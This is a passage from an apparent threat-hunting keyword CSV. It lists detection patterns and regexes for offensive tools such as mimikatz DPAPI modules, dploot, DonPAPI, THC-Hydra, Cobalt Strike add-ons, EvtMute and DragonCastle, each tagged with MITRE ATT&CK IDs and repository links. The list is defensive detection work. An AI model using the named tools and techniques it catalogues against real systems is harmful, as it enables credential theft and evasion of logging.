- T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::credhist*",".{0,1000}dpapi\:\:credhist.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::luna*",".{0,1000}dpapi\:\:luna.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::masterkey*",".{0,1000}dpapi\:\:masterkey.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::protect*",".{0,1000}dpapi\:\:protect.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::ps*",".{0,1000}dpapi\:\:ps.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::rdg*",".{0,1000}dpapi\:\:rdg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::sccm*",".{0,1000}dpapi\:\:sccm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::ssh*",".{0,1000}dpapi\:\:ssh.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::tpm*",".{0,1000}dpapi\:\:tpm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::vault*",".{0,1000}dpapi\:\:vault.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::wifi*",".{0,1000}dpapi\:\:wifi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::wwman*",".{0,1000}dpapi\:\:wwman.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi_dump*",".{0,1000}dpapi_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*dpapi_dump_*.txt*",".{0,1000}dpapi_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*dpapi_pick/credhist.py*",".{0,1000}dpapi_pick\/credhist\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*DPAPImk2john.py*",".{0,1000}DPAPImk2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*dpl4hydra *",".{0,1000}dpl4hydra\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*dpl4hydra.sh*",".{0,1000}dpl4hydra\.sh.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*dpl4hydra_*.csv*",".{0,1000}dpl4hydra_.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*dpl4hydra_*.tmp*",".{0,1000}dpl4hydra_.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*dpl4hydra_linksys*",".{0,1000}dpl4hydra_linksys.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*dploot -*",".{0,1000}dploot\s\-.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot sccm -d*",".{0,1000}dploot\ssccm\s\-d.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*backupkey*",".{0,1000}dploot.{0,1000}backupkey.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*browser*",".{0,1000}dploot.{0,1000}browser.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*certificates*",".{0,1000}dploot.{0,1000}certificates.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*credentials*",".{0,1000}dploot.{0,1000}credentials.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*machinecertificates*",".{0,1000}dploot.{0,1000}machinecertificates.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*machinecredentials*",".{0,1000}dploot.{0,1000}machinecredentials.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*machinemasterkeys*",".{0,1000}dploot.{0,1000}machinemasterkeys.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*machinevaults*",".{0,1000}dploot.{0,1000}machinevaults.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*masterkeys*",".{0,1000}dploot.{0,1000}masterkeys.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*vaults*",".{0,1000}dploot.{0,1000}vaults.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*wifi*",".{0,1000}dploot.{0,1000}wifi.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot.lib.dpapi*",".{0,1000}dploot\.lib\.dpapi.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot.lib.smb*",".{0,1000}dploot\.lib\.smb.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot.triage.*",".{0,1000}dploot\.triage\..{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot.triage.sccm import SCCMTriage*",".{0,1000}dploot\.triage\.sccm\simport\sSCCMTriage.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot/releases/download/*/dploot*",".{0,1000}dploot\/releases\/download\/.{0,1000}\/dploot.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot_linux_adm64*",".{0,1000}dploot_linux_adm64.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot-main.zip*",".{0,1000}dploot\-main\.zip.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*DQoNCiAgICwuICAgKCAgIC4gICAgICApICAgICAgICAgICAgICAgIiAgICAgICAgICAgICwuICAgKCAgI*",".{0,1000}DQoNCiAgICwuICAgKCAgIC4gICAgICApICAgICAgICAgICAgICAgIiAgICAgICAgICAgICwuICAgKCAgI.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*dr0op/CrossNet*",".{0,1000}dr0op\/CrossNet.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*Dr0p1t-Framework*",".{0,1000}Dr0p1t\-Framework.{0,1000}","offensive_tool_keyword","Dr0p1t-Framework","Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) .)","T1203 - T1005 - T1064","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/Dr0p1t-Framework","1","1","N/A","N/A","10","1364","373","2018-11-03T19:00:12Z","2017-02-11T21:24:11Z" "*dr4k0nia/NixImports*",".{0,1000}dr4k0nia\/NixImports.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*DragonCastle - @TheXC3LL*",".{0,1000}DragonCastle\s\-\s\@TheXC3LL.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*DragonCastle.dll*",".{0,1000}DragonCastle\.dll.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*dragoncastle.py -*",".{0,1000}dragoncastle\.py\s\-.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*DReverseProxy.git*",".{0,1000}DReverseProxy\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*DReverseServer.go*",".{0,1000}DReverseServer\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*drgreenthumb93/CVE-2022-30190-follina*",".{0,1000}drgreenthumb93\/CVE\-2022\-30190\-follina.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" "*DriverQuery.exe no-msft*",".{0,1000}DriverQuery\.exe\sno\-msft.{0,1000}","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*drk1wi/Modlishka*",".{0,1000}drk1wi\/Modlishka.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling 